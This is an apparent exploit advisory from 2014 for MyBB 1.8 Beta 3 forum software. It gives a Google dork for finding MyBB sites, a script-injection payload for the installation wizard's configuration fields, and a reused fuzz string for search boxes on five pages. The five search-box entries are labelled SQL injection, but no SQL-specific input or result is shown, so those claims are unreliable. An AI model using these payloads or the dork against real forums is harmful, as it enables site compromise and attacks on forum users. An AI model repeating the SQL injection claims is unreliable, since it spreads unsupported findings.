facebook facebook twitter rss

MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection

Author: DemoLisH , Published: 22-08-2014
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org

***************************************************

a) Cross Site Scripting in Installation Wizard ( Board Configuration )

Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>
localhost/install/index.php

Now let's finish setup and go to the homepage.



b) SQL Injection in Private Messages ( User CP )

Go to -> Inbox, for example:
localhost/private.php

Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



c) SQL Injection in Showthread

Go to -> Show Thread, for example:
localhost/showthread.php?tid=1

Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



d) SQL Injection in Search

Go to -> Search, for example:
localhost/search.php

Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



e) SQL Injection in Help Documents

Go to -> Help Documents, for example:
localhost/misc.php?action=help

Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



f) SQL Injection in Forum Display

Go to -> Forum Display, for example:
localhost/forumdisplay.php?fid=2

Search at the following code "Search this Forum":
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


***************************************************

[~#~] Thanks To:
Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.

Like us on Facebook :